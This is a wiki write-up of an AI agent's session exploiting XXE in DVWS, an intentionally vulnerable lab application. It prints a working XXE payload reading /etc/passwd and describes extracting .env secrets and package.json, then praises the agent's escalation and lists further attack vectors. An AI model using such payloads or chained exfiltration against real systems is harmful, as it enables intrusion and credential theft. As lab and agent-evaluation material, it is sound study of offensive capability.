Skip to content

XXE 1IBLJ_sess_decoded

“samuele edited this page Mar 30, 2026 · 1 revision

XXE-1IBLJ -- XXE via XML Import for File Exfiltration

Session Decoded: From Failed WSDL Hunt to Full Secrets Extraction in 9 Minutes


The Prompt

Target port 80. Discover SOAP/WSDL endpoints on the Express application.
Craft an XXE payload in the SOAP XML envelope to read /etc/passwd.
Escalate to exfiltrate application source code and environment files.

The prompt assumes there's a SOAP/WSDL service to exploit. There isn't one -- at least not in the traditional sense. The agent had to find the actual XXE vector on its own: an XML notes import feature buried inside the authenticated application.


What Happened: The Full Attack Chain

Phase 1 -- Recon and WSDL Hunt (8:38 - 8:39 PM)

The agent queried the Neo4j graph and found the target running Express on port 80, with known endpoints like /api/v2/login, /api/v2/notes, /api/upload. No SOAP/WSDL endpoints in the graph.

It launched 3 parallel probes:

  • Fetched the homepage -- found the DVWS login page with AngularJS frontend
  • Checked /api/v2/info -- got 403 Forbidden
  • Enumerated 19 common SOAP/WSDL paths (/wsdl, /soap, /service, /ws, /?wsdl, /api/v2/soap, etc.)

Result: All paths returned 404 except /?wsdl which returned 200. But when the agent fetched it, it got back the same login page HTML -- Express was doing SPA fallback routing, not serving a real WSDL. Dead end.


Phase 2 -- The Pivot: Finding the Real XXE Vector (8:39 - 8:40 PM)

With no SOAP endpoint found, the agent pivoted with 3 parallel actions:

  1. Web search for "DVWS Damn Vulnerable Web Services SOAP XXE endpoint" -- confirmed the app has intentional XXE vulnerabilities
  2. Fetched home.html (the authenticated homepage) -- this was the breakthrough. The navigation menu revealed an "Import Notes (XML)" feature at import_notes.html
  3. Continued SOAP path enumeration with 18 more paths -- all 404

The agent then fetched import_notes.html source code and extracted the exact attack surface:

  • Endpoint: POST /api/v2/notes/import/xml
  • Format: JSON body { xml: xmlData } with JWT Bearer token
  • Expected XML: <notes><note><name>...</name><body>...</body><type>...</type></note></notes>

Phase 3 -- Account Setup (8:40 - 8:41 PM)

The agent registered testxxe:testxxe123 and logged in to get a JWT token. Straightforward -- two API calls.


Phase 4 -- XXE Crafting: Two Failures, Then Success (8:41 - 8:42 PM)

Attempt 1 -- Shell escaping disaster: The agent sent the XXE payload via curl with shell variable interpolation. The double quotes inside the XML broke the JSON structure.

Response: SyntaxError: Expected ',' or '}' after property value in JSON at position 24

But the error stack trace leaked a critical piece of info: the application path is /home/dvws-node/. The agent noted this for later file exfiltration.

Recovery: Switched from curl to Python requests with json.dumps() for proper encoding.

Attempt 2 -- Mongoose validation rejection: The payload used <type>text</type>, but MongoDB/Mongoose rejected it:

"text is not a valid enum value for path type.0"

The error helpfully listed valid values: note, reminder, list, secret, public.

Recovery: Changed to <type>note</type> and moved the XXE entity reference to the <name> field.

Attempt 3 -- /etc/passwd exfiltrated:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<notes>
  <note>
    <name>&xxe;</name>
    <body>xxe-test</body>
    <type>note</type>
  </note>
</notes>

Response: HTTP 200 -- "Successfully imported 1 notes."

The agent then fetched its notes via GET /api/v2/notes and found the name field contained the full /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
node:x:1000:1000::/home/node:/bin/bash

19 system users. Two with shell access (root and node).


Phase 5 -- Escalation: Secrets Extraction (8:43 - 8:45 PM)

With the XXE confirmed, the agent launched 3 parallel payloads targeting high-value files:

Target File Result
/home/dvws-node/server.js FAILED -- JavaScript contains <, >, & chars that break XML parsing
/home/dvws-node/.env SUCCESS
/proc/self/environ FAILED -- null bytes between variables are invalid in XML

The .env file revealed everything:

EXPRESS_JS_PORT=80
XML_RPC_PORT=9090
GRAPHQL_PORT=4000
JWT_SECRET=access
MONGO_LOCAL_CONN_URL=mongodb://localhost:27017/node-dvws
MONGO_DB_NAME=dvws-user-auth
SQL_LOCAL_CONN_URL=localhost
SQL_DB_NAME=dvws_sqldb
SQL_USERNAME=root
SQL_PASSWORD=mysecretpassword

The agent then attempted package.json (succeeded) and a CDATA-wrapped parameter entity approach for server.js (failed -- libxml2 doesn't allow parameter entity expansion in internal DTD subsets).

The package.json revealed the full dependency tree, including:

  • libxmljs v1.0.11 -- the vulnerable XML parser enabling XXE
  • node-serialize v0.0.4 -- known deserialization RCE vulnerability
  • mysql + mysql2 + sequelize -- SQL injection surface
  • Main entry point: app.js (not server.js as initially guessed)

Final Scoreboard

Files Exfiltrated

File Secrets Found
/etc/passwd 19 system users, 2 with shell access
/home/dvws-node/.env JWT secret (access), MySQL root password (mysecretpassword), MongoDB connection string, port mappings
/home/dvws-node/package.json Full app structure, vulnerable dependencies, entry point

Files That Failed

File Why
server.js / app.js JS source contains XML-special chars (<, >, &) -- would need external DTD for OOB exfiltration
/proc/self/environ Null byte separators are invalid in XML

Credentials Extracted

Asset Value
JWT Signing Secret access
MySQL Root Password mysecretpassword
MongoDB No auth required (localhost:27017)

Timeline Summary

Time Action Result
8:38 Query recon graph Found target info, no SOAP endpoints
8:38 Probe homepage + 19 WSDL paths All 404, /?wsdl was SPA fallback
8:39 Web search + fetch home.html Found "Import Notes (XML)" feature
8:40 Fetch import_notes.html source Extracted exact endpoint + XML format
8:40 Register testxxe account Account created
8:41 Login for JWT token Token obtained
8:41 XXE attempt #1 (curl) JSON escaping failure -- leaked app path
8:41 XXE attempt #2 (Python) Mongoose enum validation failure -- learned valid types
8:42 XXE attempt #3 /etc/passwd exfiltrated
8:43 3 parallel XXE payloads .env SUCCESS, server.js FAIL, /proc/self/environ FAIL
8:44 package.json + CDATA attempt package.json SUCCESS, CDATA server.js FAIL
8:46 Final summary 3 files exfiltrated, 3 credential sets extracted

Total time: ~9 minutes from first request to full secrets extraction.


Key Agent Capabilities Demonstrated

1. Endpoint Discovery Without Documentation

No SOAP/WSDL existed. The agent found the real XXE vector by reading the authenticated homepage HTML, discovering the "Import Notes (XML)" feature, then reading the import page's JavaScript source to extract the exact API endpoint and XML format.

2. Error-Driven Intelligence Gathering

Every failure taught the agent something:

  • JSON parse error leaked the app path (/home/dvws-node/)
  • Mongoose validation error revealed valid enum values (note, reminder, list, secret, public)
  • These "failures" directly informed the successful payload.

3. Knowing What Works and What Doesn't

The agent understood XML parser limitations: JS source code breaks inline XXE (XML-special chars), /proc/self/environ has null bytes. It correctly identified that an external DTD (OOB exfiltration) would be needed for source code -- but prioritized the high-value .env and package.json targets that it could extract inline.

4. Parallel Escalation

Once the XXE was confirmed, the agent immediately fired 3 parallel payloads at different files, then another 2 in the next wave. No sequential waiting -- maximum throughput.

5. Attack Surface Mapping for Future Chains

The extracted package.json didn't just confirm the current attack -- it mapped future attack vectors: node-serialize for deserialization RCE, mysql/sequelize for SQL injection, needle for SSRF. The .env credentials enable direct database access. One XXE opened the door to everything.


Raw Session Log

The complete unedited agent session log is available in XXE-1IBLJ_session.md.

Clone this wiki locally